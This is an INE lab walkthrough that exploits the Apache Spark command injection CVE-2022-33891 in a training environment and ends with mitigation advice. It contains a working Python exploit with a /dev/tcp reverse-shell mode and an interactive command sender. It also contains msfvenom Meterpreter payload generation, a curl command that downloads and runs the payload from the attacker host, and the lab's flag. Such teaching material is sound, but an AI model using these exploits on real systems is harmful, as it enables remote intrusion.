    24 August 22

    Lab Walkthrough - Apache Spark Shell Command Injection

    Posted by INE

    In our lab walkthrough series, we go through selected lab exercises on our INE Platform. Subscribe or sign up for a 7-day, risk-free trial with INE and access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!

    Purpose: Learn how to exploit Apache Spark with the Metasploit Framework, and use Python to write and modify scripts that exploit the Apache Spark application.

    Technical difficulty: Beginner

    Introduction

    In 2022, a critical shell command injection vulnerability was found in Apache Spark. The Apache Spark UI can enable ACLs via the configuration option spark.acls.enable. An authentication filter then checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow someone to perform impersonation by providing an arbitrary user name. A malicious user might then be able to reach a permission check function that ultimately builds a Unix shell command from their input and executes it. This results in arbitrary shell command execution as the user Spark is currently running as.

    This affects Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1.
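
    The affected ranges above can be turned into a quick check. This is only a sketch: the function names are made up for illustration, and it assumes plain numeric versions such as 3.1.1 (no suffixes like -SNAPSHOT).

```python
def parse_version(version: str) -> tuple:
    """Turn a dotted version such as '3.1.1' into a tuple of ints."""
    return tuple(int(part) for part in version.split("."))


# Inclusive (low, high) ranges copied from the affected-version statement.
AFFECTED_RANGES = [
    ((0, 0, 0), (3, 0, 3)),  # 3.0.3 and earlier
    ((3, 1, 1), (3, 1, 2)),  # 3.1.1 to 3.1.2
    ((3, 2, 0), (3, 2, 1)),  # 3.2.0 to 3.2.1
]


def is_affected(version: str) -> bool:
    """Return True if the version falls inside one of the listed ranges."""
    parsed = parse_version(version)
    return any(low <= parsed <= high for low, high in AFFECTED_RANGES)


if __name__ == "__main__":
    for candidate in ("3.1.1", "3.1.3", "3.2.1", "3.3.0"):
        print(candidate, is_affected(candidate))
```

    Tuples compare element by element, so no third-party version library is needed for this simple case.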

    The vulnerability was discovered by Kostya Kortchinsky, a cybersecurity researcher from Databricks.

    Read More: https://lists.apache.org/thread/p847l3kopoo5bjtmxrcwk21xp6tjxqlc

    What is Command Injection?

    Command injection is an attack in which unauthorized commands are run on the host operating system. The attacker usually injects the commands by exploiting an application flaw, such as inadequate input validation.

    Lab Link: https://my.ine.com/CyberSecurity/courses/ebd09929/cyber-security-vulnerabilities-training-library/lab/0bc4e7a4-7959-4531-b0fd-ab38764a48c7

    apache_spark_lab_link.png

    Lab Environment

    In this lab environment, the user will access a Kali GUI instance. A vulnerable Apache Spark instance is deployed at http://demo.ine.local:8080

    Goal after completing this scenario: Access the /flag.txt file and read the flag!

    apache_spark_0.png

    Tools

    The best tools for this lab are:

    • Nmap

    • Bash Shell

    • Metasploit Framework

    • Python

    What is Apache Spark?

    Apache Spark is a multi-language engine for executing data engineering, data science, and machine learning on single-node machines or clusters.

    Apache Spark Key features

    Batch/streaming data

    Unify the processing of your data in batches and real-time streaming, using your preferred language: Python, SQL, Scala, Java or R.

    SQL analytics

    Execute fast, distributed ANSI SQL queries for dashboarding and ad-hoc reporting. Runs faster than most data warehouses.

    Data science at scale

    Perform Exploratory Data Analysis (EDA) on petabyte-scale data without having to resort to downsampling.

    Machine learning

    Train machine learning algorithms on a laptop and use the same code to scale to fault-tolerant clusters of thousands of machines.

    Source: https://spark.apache.org/

    Vulnerability Configuration

    • Enable ACLs by setting the configuration option spark.acls.enable to true, e.g., in conf/spark-defaults.conf
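
    From the defender's side, a small helper can tell whether a given spark-defaults.conf turns ACLs on. The sketch below assumes the file uses one property per line, with the key and value separated by whitespace or "=", and that the option is off when absent; acls_enabled is a name chosen for illustration.

```python
def acls_enabled(conf_text: str) -> bool:
    """Return True if spark.acls.enable is set to true in the given text."""
    enabled = False  # assumption: the option is off unless set explicitly
    for raw_line in conf_text.splitlines():
        line = raw_line.strip()
        if not line or line.startswith("#"):
            continue  # skip blank lines and comments
        # Accept both "key value" and "key=value".
        parts = line.replace("=", " ", 1).split(None, 1)
        if len(parts) == 2 and parts[0] == "spark.acls.enable":
            enabled = parts[1].strip().lower() == "true"
    return enabled


if __name__ == "__main__":
    sample = "# lab configuration\nspark.acls.enable true\n"
    print(acls_enabled(sample))
```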

    Vulnerable Source Code

    Link: https://github.com/apache/spark/pull/36315/files#diff-96652ee6dcef30babdeff0aed66ced6839364ea4b22b7b5fdbedc82eb655eeb5L41

       private def getUnixGroups(username: String): Set[String] = {
    -    val cmdSeq = Seq("bash", "-c", "id -Gn " + username)
         // we need to get rid of the trailing "\n" from the result of command execution
    -    Utils.executeAndGetOutput(cmdSeq).stripLineEnd.split(" ").toSet
    +    Utils.executeAndGetOutput(idPath :: "-Gn" :: username :: Nil).stripLineEnd.split(" ").toSet
       }
     }
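
    The difference between the removed and added lines can be illustrated in Python by building the two argument lists without running them. This is a sketch, not Spark's code: the function names are illustrative, and /usr/bin/id is an assumed stand-in for the idPath value used in the patch.

```python
def vulnerable_argv(username: str) -> list:
    # Mirrors the removed line: the user name is pasted into a string that
    # bash will parse, so backticks or $(...) inside it are executed.
    return ["bash", "-c", "id -Gn " + username]


def patched_argv(username: str, id_path: str = "/usr/bin/id") -> list:
    # Mirrors the added line: id is invoked directly and the user name is a
    # separate argument, so no shell ever interprets it.
    return [id_path, "-Gn", username]


if __name__ == "__main__":
    payload = "`touch /tmp/example`"
    print(vulnerable_argv(payload))
    print(patched_argv(payload))
```

    In the first list the payload ends up inside the string handed to bash -c. In the second it is only data passed to id, which would treat it as an (invalid) user name.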

    CVE-2022-33891

    • Vulnerable parameter

    http://demo.ine.local:8080/?doAs=`[command injection here]`

    The command injection occurs because Spark looks up the group membership of the user passed in the ?doAs parameter by running a raw Linux command.

    The value of ?doAs is passed to that command, and nothing is reflected back on the page during execution, so this is a blind OS command injection. Your commands run, but the response gives no indication of whether they succeeded, or even whether the program you tried to run exists on the target.

    Input passed in the ?doAs URL parameter is appended to the cmdSeq command sequence, which starts a background bash process that runs id -Gn followed by the supplied value. Anything wrapped in backticks is therefore evaluated by bash before id runs.

    Source: https://www.socinvestigation.com/cve-2022-33891-apache-spark-shell-command-injection-detection-response
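
    Backticks are also special to a local shell when typed unquoted, so one way to be sure the payload reaches the target intact is to build the URL in code and percent-encode the parameter value. The helper below is a minimal sketch; build_doas_url is a hypothetical name, and it only constructs the string without sending anything.

```python
from urllib.parse import quote


def build_doas_url(base_url: str, command: str) -> str:
    """Wrap the command in backticks and percent-encode it for ?doAs."""
    injected = f"`{command}`"
    # safe="" encodes every reserved character, including "/" and "`".
    return f"{base_url.rstrip('/')}/?doAs={quote(injected, safe='')}"


if __name__ == "__main__":
    print(build_doas_url("http://demo.ine.local:8080", "id"))
```

    The resulting URL can then be requested with any HTTP client; the server decodes the value back to the backtick-wrapped command.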

    Solution

    Step 1: Open the lab link to access the Kali machine.

    Kali machine

    apache_spark_1.png

    Step 2: Check if the provided machine is reachable.

    Command:

    ping -c 4 demo.ine.local
    apache_spark_2.jpg

    The provided machine is reachable.

    Step 3: Check all open ports on the machine.

    Command:

    nmap demo.ine.local
    apache_spark_3.jpg

    Multiple ports are open. The Apache Spark server is running on port 8080.
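
    When Nmap is not at hand, a single TCP connect attempt gives a rough equivalent for one port. The following sketch uses only the standard library; is_port_open is an illustrative name, and a successful connect says nothing about which service is listening.

```python
import socket


def is_port_open(host: str, port: int, timeout: float = 3.0) -> bool:
    """Return True if a TCP connection to host:port succeeds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        # Covers refused connections, timeouts, and name resolution errors.
        return False


if __name__ == "__main__":
    print(is_port_open("demo.ine.local", 8080))
```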

    Step 4: Open Firefox and browse to port 8080 to identify the Apache Spark server version.

    URL: http://demo.ine.local:8080

    apache_spark_4.jpg

    apache_spark_4_1.jpg

    The target Apache Spark server version is 3.1.1.

    Step 5: Run a command on the target using the vulnerable parameter ?doAs.

    Just type the URL on the Kali terminal.

    Command:

    http://demo.ine.local:8080?doAs=`id`
    apache_spark_5.jpg

    The id command executed successfully on the target server and returned output.

    Note: You won’t receive the output of every Linux command.

    This confirms that the target is vulnerable to CVE-2022-33891.

    Step 6: Write an Nmap script that detects the vulnerable Spark version, i.e., 3.1.1

    Nmap script

    -- The Head Section --
    description = [[The script to detect The Apache Spark Shell Command Injection vulnerability]]
    ---
    -- @usage
    -- nmap --script detect-spark-vuln <target>
    -- @output
    -- PORT   STATE SERVICE
    -- 8080/tcp open  http
    -- |_detect-spark-vuln: Apache Spark is Vulnerable to Command Injection!!
    categories = {"default", "safe"}
    local shortport = require "shortport"
    local http = require "http"
    local string = require "string"
    -- The Rule Section --
    -- Run against any port that looks like an HTTP service
    portrule = shortport.http
    -- The Action Section --
    action = function(host, port)
        local uri = "/"
        local version = "3.1.1"
        local response = http.get(host, port, uri)
        -- Only inspect successful responses that carry a body
        if response and response.status == 200 and response.body then
            -- Plain-text search (4th argument true), so "." is not treated as a pattern wildcard
            if string.find(response.body, version, 1, true) then
                return "Apache Spark is Vulnerable to Command Injection!!"
            else
                return "Apache Spark Not Vulnerable!!"
            end
        end
    end

    The script is straightforward: it requests the root page on the target's HTTP port, looks for the version string 3.1.1 in the response body, and reports whether the target is vulnerable.

    Save the above code on the attacker’s machine and run it. The file extension should be .nse.

    Commands:

    nano detect-spark-vuln.nse

    <paste code>

    apache_spark_6.jpg

    Run the script.

    nmap --script detect-spark-vuln.nse demo.ine.local
    apache_spark_6_1.jpg

    The custom Nmap script successfully detected Apache Spark server version 3.1.1.
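
    The same version check can be sketched in Python by pulling the version out of the page body and comparing it exactly, rather than searching for a loose pattern. The markup it looks for (an element with class="version") is an assumption about how the Spark UI renders its version, and both function names are illustrative.

```python
import re

# Assumed markup: <span class="version" ...>3.1.1</span>
VERSION_RE = re.compile(r'class="version"[^>]*>\s*v?(\d+\.\d+\.\d+)')


def find_spark_version(body: str):
    """Return the version string found in the page body, or None."""
    match = VERSION_RE.search(body)
    return match.group(1) if match else None


def page_reports_version(body: str, version: str = "3.1.1") -> bool:
    """Exact comparison, so '3.1.10' or '3x1y1' do not count as 3.1.1."""
    return find_spark_version(body) == version


if __name__ == "__main__":
    sample = '<span class="version" style="margin-right: 15px;">3.1.1</span>'
    print(find_spark_version(sample))
```

    The body would come from an HTTP GET of http://demo.ine.local:8080/; fetching is left out so the parsing logic can be tried offline.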

    Step 7: Run the Python script to detect the Apache Spark Command Injection vulnerability

    Python Script

    #!/usr/bin/env python3
    import requests
    import argparse
    import base64
    import datetime
    from colorama import Fore
    parser = argparse.ArgumentParser(description='CVE-2022-33891 Python POC Exploit Script')
    parser.add_argument('-u', '--url', help='URL to exploit.', required=True)
    parser.add_argument('-p', '--port', help='Exploit target\'s port.', required=True)
    parser.add_argument('--revshell', default=False, action="store_true", help="Reverse Shell option.")
    parser.add_argument('-lh', '--listeninghost', help='Your listening host IP address.')
    parser.add_argument('-lp', '--listeningport', help='Your listening host port.')
    parser.add_argument('--check', default=False, action="store_true", help="Checks if the target is exploitable with a sleep test")
    parser.add_argument('--verbose', default=False, action="store_true", help="Verbose mode")
    args = parser.parse_args()
    # nothing to see here, move along!
    headers = {
       'User-Agent': 'CVE-2022-33891 POC',
    }
    # Colors :D
    info = (Fore.BLUE + "[*] " + Fore.RESET)
    recc = (Fore.YELLOW + "[*] " + Fore.RESET)
    good = (Fore.GREEN + "[+] " + Fore.RESET)
    important = (Fore.CYAN + "[!] " + Fore.RESET)
    printError = (Fore.RED + "[X] " + Fore.RESET)
    full_url = f"{args.url}:{args.port}"
    def check_for_vuln(url):
       try:
           print(info + "Attempting to connect to site...")
           r = requests.get(f"{url}/?doAs='testing'", allow_redirects=False, headers=headers)
           if args.verbose:
               print(info + f"URL request: {url}/?doAs='testing'")
               print(info + f"Response status code: {r.status_code}")
           if r.status_code != 403:
               print(printError + "No ?doAs= endpoint. Does not look vulnerable.")
               quit(1)
           elif "org.apache.spark.ui" not in r.content.decode("utf-8"):
               print(printError + "Does not look like an Apache Spark server.")
               quit(1)
           else:
               print(important + "Performing sleep test of 10 seconds...")
               t1 = datetime.datetime.now()
               if args.verbose:
                   print(info + f"T1: {t1}")
               run_cmd("sleep 10")
               t2 = datetime.datetime.now()
               delta = t2-t1
               if args.verbose:
                   print(info + f"T2: {t2}")
                   print(info + f"Delta T: {delta.seconds}")
               if delta.seconds not in range(8,12):
                   print(printError + "Sleep was less than 10. This target is probably not vulnerable")
               else:
                   print(good + "Sleep was 10 seconds! This target is probably vulnerable!")
               exit(0)
       except Exception as e:
           print(printError + str(e))
    def cmd_prompt():
       cmd = input("[cve-2022-33891> ")
       return cmd
    def base64_encode(cmd):
       try:
           message_bytes = cmd.encode('ascii')
           base64_bytes = base64.b64encode(message_bytes)
           base64_cmd = base64_bytes.decode('ascii')
           return base64_cmd
       except Exception as e:
           print(printError +str(e))
    def run_cmd(cmd):
       try:
           if args.verbose:
               print(info + "Command is: " + cmd)
           base64_cmd = base64_encode(cmd)
           if args.verbose:
               print(info + "Base64 command is: " + base64_cmd)
           exploit = f"/?doAs=`echo {base64_cmd} | base64 -d | bash`"
           exploit_req = f"{full_url}{exploit}"
           if args.verbose:
               print(info + "Full exploit request is: " + exploit_req)
               print(info + "Sending exploit...")
           r = requests.get(exploit_req, allow_redirects=False, headers=headers)
           if args.verbose:
               print(info + f"Response status code: {r.status_code}\n"+ info + "Hint: 403 is good.")
       except Exception as e:
           print(printError + str(e))
           quit(1)
    def revshell(lhost, lport):
       print(info + f"Reverse shell mode.\n" + recc+ f"Set up your listener by entering the following:\nnc -nvlp {lport}")
       input(recc + "When your listener is set up, press enter!")
       rev_shell_cmd = f"sh -i >& /dev/tcp/{lhost}/{lport} 0>&1"
       run_cmd(rev_shell_cmd)
    def main():
       try:
           if args.check and args.revshell:
               print(printError + "Please choose either revshell or check!")
               exit(1)
           elif args.check:
               check_for_vuln(full_url)
           # Revshell
           elif args.revshell:
               if not (args.listeninghost and args.listeningport):
                   print(printError + "You need --listeninghost and --listeningport!")
                   exit(1)
               else:
                   lhost = args.listeninghost
                   lport = args.listeningport
                   revshell(lhost, lport)
           else:
               # "Interactive" mode
               print(info + "\"Interactive\" mode!\n" + important + "Note: you will not receive any output from these commands. Try using something like ping or sleep to test for execution.")
               while True:
                   command_to_run = cmd_prompt()
                   run_cmd(command_to_run)
       except KeyboardInterrupt:
           print("\n"+ info + "Goodbye!")
    if __name__ == "__main__":
       main()

    Copy and paste the above code into the Kali GUI, save it as PoC.py, and run it to check whether the target is vulnerable.

    Check the script help option.

    Command:

    python3 PoC.py --help
    apache_spark_7.jpg

    Running the script to verify the vulnerability.

    Command:

    python3 PoC.py -u http://demo.ine.local -p 8080 --check --verbose
    apache_spark_7_1.jpg

    Target appears to be vulnerable.
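
    The --check option relies on timing: because the injection is blind, a command such as sleep 10 is sent and the response delay is measured. The idea can be sketched on its own as follows. The helper names and the two-second tolerance are assumptions rather than values taken from the PoC, and the action passed in stands for whatever function sends the request.

```python
import time


def timed(action) -> float:
    """Run action() and return how many seconds it took."""
    start = time.monotonic()
    action()
    return time.monotonic() - start


def delay_matches(elapsed: float, expected: float, tolerance: float = 2.0) -> bool:
    """True if the measured delay is close to the injected sleep time."""
    return abs(elapsed - expected) <= tolerance


if __name__ == "__main__":
    # Stand-in for a request whose payload is "sleep 1".
    elapsed = timed(lambda: time.sleep(1))
    print(delay_matches(elapsed, expected=1, tolerance=0.5))
```

    A slow network can produce a similar delay, so a match is a hint rather than proof; repeating the test with a different sleep value helps rule that out.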

    Step 8: Write a simple Python script to execute commands on the target server

    Python Script

    import argparse
    import base64
    import sys
    import requests
    my_parser = argparse.ArgumentParser(description='Apache Spark Command Injection')
    my_parser.add_argument('-T', '--URL', type=str, required=True, help='Target base URL')
    args = my_parser.parse_args()
    target = args.URL
    def shell(target):
        url = target
        # Confirm the target responds before starting the command loop
        r = requests.get(target)
        if r.status_code == 200:
            print("[+] Exploiting")
            print("[+] Getting the shell... :)")
            while True:
                try:
                    command = input("# ")
                    # Base64-encode the command so quotes and spaces survive the URL
                    command_to_encode = command.encode('ascii')
                    base64_format = base64.b64encode(command_to_encode)
                    base64_final_cmd = base64_format.decode('ascii')
                    print("Base64 Command: " + base64_final_cmd)
                    # The backticks make bash on the target decode and run the command
                    payload = f"/?doAs=`echo {base64_final_cmd} | base64 -d | bash`"
                    exploiting = f"{url}{payload}"
                    print(exploiting)
                    r = requests.get(exploiting, allow_redirects=False)
                    print("Command Executed")
                except KeyboardInterrupt:
                    sys.exit("\nBye")
        else:
            print("[*] Some issue occurred.")
    shell(target)

    Copy and paste the above code into the Kali GUI, save it as New-PoC.py, and use it to gain a Meterpreter shell.

    apache_spark_8.jpg

    Check the Attacker Machine IP address:

    Command:

    ip addr
    apache_spark_8_1.jpg

    Generate the malicious ELF executable for the reverse connection.

    Command:

    msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.27.2 LPORT=4444 -f elf > shell.elf
    file shell.elf
    apache_spark_8_2.jpg

    Start a simple Python HTTP server to serve the shell.elf file.

    Command:

    python3 -m http.server 80
    apache_spark_8_3.jpg

    Start Metasploit multi-handler for the new meterpreter session.

    Command:

    msfconsole -q
    use exploit/multi/handler
    set PAYLOAD linux/x64/meterpreter/reverse_tcp
    set LHOST 10.10.27.2
    exploit
    apache_spark_8_4.jpg

    Check if the script is running correctly by checking its help option.

    Command:

    python3 New-PoC.py --help
    apache_spark_8_5.jpg

    It’s working fine. Run the script and download the shell.elf file on the target machine using curl by exploiting the vulnerability.

    Command:

    python3 New-PoC.py --URL http://demo.ine.local:8080
    apache_spark_8_6.jpg

    Command:

    curl http://10.10.27.2/shell.elf --output /tmp/shell.elf; chmod +x /tmp/shell.elf; /bin/bash -c "/tmp/shell.elf"
    apache_spark_8_7.jpg

    The shell.elf file was downloaded to the /tmp/ directory and executed on the target machine. After shell.elf ran, the handler received a Meterpreter session:

    apache_spark_8_8.jpg
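
    The download-and-run command from this step reaches the target as a Base64-wrapped payload. The two helpers below sketch how that string is assembled; their names are illustrative, the defaults mirror the lab values, and nothing is sent over the network.

```python
import base64


def stager_command(lhost: str, filename: str = "shell.elf", dest_dir: str = "/tmp") -> str:
    """Build the download, chmod, and execute one-liner used in this step."""
    dest = f"{dest_dir}/{filename}"
    return (
        f"curl http://{lhost}/{filename} --output {dest}; "
        f"chmod +x {dest}; /bin/bash -c \"{dest}\""
    )


def wrap_for_doas(command: str) -> str:
    """Base64-encode the command and wrap it so bash decodes and runs it."""
    encoded = base64.b64encode(command.encode("ascii")).decode("ascii")
    return f"`echo {encoded} | base64 -d | bash`"


if __name__ == "__main__":
    print(wrap_for_doas(stager_command("10.10.27.2")))
```

    Standard Base64 output can contain +, / and =, so percent-encoding the wrapped value when it is placed in the ?doAs parameter is a reasonable precaution.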

    Step 9: Find the flag.

    Command:

    ls /
    cat /flag.txt
    apache_spark_9.jpg

    FLAG: aad8ee70c54f1cc0c0aad082423b09fe

    Mitigation

    • Upgrade to a supported Apache Spark maintenance release: 3.1.3, 3.2.2, or 3.3.0 or later.

    © 2024 INE. All Rights Reserved. All logos, trademarks and registered trademarks are the property of their respective owners.